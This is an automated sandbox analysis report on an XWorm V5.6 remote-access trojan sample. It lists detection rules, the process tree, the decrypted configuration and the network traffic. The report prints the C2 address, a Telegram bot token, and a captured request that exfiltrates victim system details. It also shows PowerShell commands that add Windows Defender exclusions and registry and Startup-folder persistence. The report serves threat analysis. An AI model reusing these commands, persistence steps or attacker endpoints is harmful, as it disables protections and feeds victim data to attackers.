Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1560514
MD5:	8d52069bd117da94e0b0b70e73e33fb0
SHA1:	e8090adddff167e1bda4194af968ba4bc22a2d60
SHA256:	b3e217c467cfe1e8079e82b88f2f99950a9459330a8843070ebb34bf3e2bcf38
Tags:	exeuser-Bitsight
Infos:

Detection

XWorm

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Telegram RAT

Yara detected XWorm

.NET source code contains method to dynamically call methods (often used by packers)

.NET source code contains potential unpacker

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Bypasses PowerShell execution policy

C2 URLs / IPs found in malware configuration

Drops PE files with benign system names

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Protects its processes via BreakOnTermination flag

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: System File Execution Location Anomaly

Uses the Telegram API (likely for C&C communication)

Yara detected Generic Downloader

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a start menu entry (Start Menu\Programs\Startup)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sigma detected: Change PowerShell Policies to an Insecure Level

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: Powershell Defender Exclusion

Sigma detected: Startup Folder File Write

Stores files to the Windows start menu directory

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

file.exe (PID: 7312 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)

powershell.exe (PID: 7412 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7420 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7640 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'file.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7648 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7880 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 8136 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'svchost.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 8144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

svchost.exe (PID: 7480 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)

svchost.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Local\svchost.exe" MD5: 8D52069BD117DA94E0B0B70E73E33FB0)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
XWorm	Malware with wide range of capabilities ranging from RAT to ransomware.	No Attribution	https://any.run/cybersecurity-blog/xworm-malware-communication-analysis/ https://any.run/cybersecurity-blog/xworm-technical-analysis-of-a-new-malware-version/ https://blog.cyble.com/2022/08/19/evilcoder-project-selling-multiple-dangerous-tools-online/ https://cert.pl/en/posts/2023/10/deworming-the-xworm/ https://embee-research.ghost.io/infrastructure-analysis-with-dns-pivoting/	https://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["87.120.112.33"], "Port": 8398, "Aes key": "<213923746>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage"}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
file.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
file.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
file.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfe13:$cnc4: POST / HTTP/1.1

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_XWorm_1	Yara detected XWorm	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\svchost.exe	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
C:\Users\user\AppData\Local\svchost.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\svchost.exe	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfe13:$cnc4: POST / HTTP/1.1

Memory Dumps

Source	Rule	Description	Author	Strings
00000000.00000002.2950679638.0000000002A23000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000002.2950679638.0000000002A0F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
00000000.00000000.1674417480.00000000005C2000.00000002.00000001.01000000.00000003.sdmp	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x104e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10586:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1069b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfc13:$cnc4: POST / HTTP/1.1
Process Memory Space: file.exe PID: 7312	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
Process Memory Space: file.exe PID: 7312	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 1 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
0.0.file.exe.5c0000.0.unpack	JoeSecurity_XWorm	Yara detected XWorm	Joe Security
0.0.file.exe.5c0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.0.file.exe.5c0000.0.unpack	MALWARE_Win_AsyncRAT	Detects AsyncRAT	ditekSHen	0x106e9:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0 0x10786:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1 0x1089b:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 0xfe13:$cnc4: POST / HTTP/1.1

Sigma Signatures

System Summary

Sigma detected: Files With System Process Name In Unsuspected Locations

Source: File created

Author: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetFilename: C:\Users\user\AppData\Local\svchost.exe

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe

Sigma detected: System File Execution Location Anomaly

Source: Process started

Author: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7480, ProcessName: svchost.exe

Sigma detected: Change PowerShell Policies to an Insecure Level

Source: Process started

Author: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\svchost.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Startup Folder File Write

Source: File created

Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\Desktop\file.exe, ProcessId: 7312, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7312, ParentProcessName: file.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\file.exe', ProcessId: 7412, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine: "C:\Users\user\AppData\Local\svchost.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\svchost.exe, NewProcessName: C:\Users\user\AppData\Local\svchost.exe, OriginalFileName: C:\Users\user\AppData\Local\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: "C:\Users\user\AppData\Local\svchost.exe" , ProcessId: 7480, ProcessName: svchost.exe

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:21:01.851871+0100	2028371	3	Unknown Traffic	192.168.2.4	49735	20.189.173.21	443	TCP

ETPRO MALWARE Win32/XWorm Checkin via Telegram

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:22:07.016128+0100	2853685	1	A Network Trojan was detected	192.168.2.4	49749	149.154.167.220	443	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:22:14.748492+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:21.488080+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:28.854472+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:35.196511+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:35.586248+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:42.240444+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:48.648005+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:49.359041+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:49.569088+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:22:55.621654+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:01.060097+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:06.834762+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP
2024-11-21T22:23:07.729313+0100	2852870	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP

ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:22:21.558331+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49755	87.120.112.33	8398	TCP
2024-11-21T22:22:35.200060+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49755	87.120.112.33	8398	TCP
2024-11-21T22:22:48.649987+0100	2852923	1	Malware Command and Control Activity Detected	192.168.2.4	49755	87.120.112.33	8398	TCP

ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-11-21T22:22:49.569088+0100	2858924	1	Malware Command and Control Activity Detected	87.120.112.33	8398	192.168.2.4	49755	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\svchost.exe

Avira: detection malicious, Label: TR/Spy.Gen

Found malware configuration

Source: file.exe	Malware Configuration Extractor: Xworm {"C2 url": ["87.120.112.33"], "Port": 8398, "Aes key": "<213923746>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Source: file.exe.7312.0.memstrmin	Malware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\svchost.exe

ReversingLabs: Detection: 76%

Multi AV Scanner detection for submitted file

Source: file.exe

ReversingLabs: Detection: 76%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\svchost.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: file.exe	String decryptor: 87.120.112.33
Source: file.exe	String decryptor: 8398
Source: file.exe	String decryptor: <213923746>
Source: file.exe	String decryptor: <Xwormmm>
Source: file.exe	String decryptor: XWorm V5.6
Source: file.exe	String decryptor: USB.exe
Source: file.exe	String decryptor: %LocalAppData%
Source: file.exe	String decryptor: svchost.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49749 version: TLS 1.2

Source: file.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 87.120.112.33:8398 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.4:49755 -> 87.120.112.33:8398
Source: Network traffic	Suricata IDS: 2858924 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 87.120.112.33:8398 -> 192.168.2.4:49755
Source: Network traffic	Suricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.4:49749 -> 149.154.167.220:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: 87.120.112.33

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Yara detected Generic Downloader

Source: Yara match	File source: file.exe, type: SAMPLE
Source: Yara match	File source: 0.0.file.exe.5c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Local\svchost.exe, type: DROPPED

Source: global traffic

TCP traffic: 192.168.2.4:49755 -> 87.120.112.33:8398

Source: global traffic

HTTP traffic detected: GET /bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0AEB905B3EB694EB551DA9%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20FO89G66H%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: Joe Sandbox View

ASN Name: UNACS-AS-BG8000BurgasBG UNACS-AS-BG8000BurgasBG

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: Network traffic

Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49735 -> 20.189.173.21:443

Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	TCP traffic detected without corresponding DNS query: 87.120.112.33
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: api.telegram.org

Source: file.exe, 00000000.00000002.2950679638.0000000002ABD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mic
Source: powershell.exe, 00000001.00000002.1767227966.0000021FF13B8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E1661000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2289580802.0000022735177000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micft.cMicRosof
Source: powershell.exe, 00000007.00000002.2081462859.000001D6E14B0000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micros
Source: powershell.exe, 00000001.00000002.1768716785.0000021FF1532000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2081626853.000001D6E16BB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.microso
Source: powershell.exe, 00000001.00000002.1770104920.0000021FF16F1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.mw
Source: powershell.exe, 00000001.00000002.1758662678.0000021F90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1860676438.000001B6CE7C3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2049175145.000001D6D8F83000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2258524441.000002272C991000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000001.00000002.1741638824.0000021F80229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE979000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C92C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000001.00000002.1770104920.0000021FF1740000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://wwcrosoft.com/pki/certs/MicWinPCA_2010-07-06.crt0
Source: powershell.exe, 0000000B.00000002.2130916152.000002271CB49000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.1768900045.0000021FF1621000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.micom/pkiops/Docs/ry.htm0
Source: powershell.exe, 00000001.00000002.1741638824.0000021F80001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1796456887.000001B6BE751000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.1923470094.000001D6C8F11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2130916152.000002271C921000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: file.exe, 00000000.00000002.2950679638.00000000029A1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
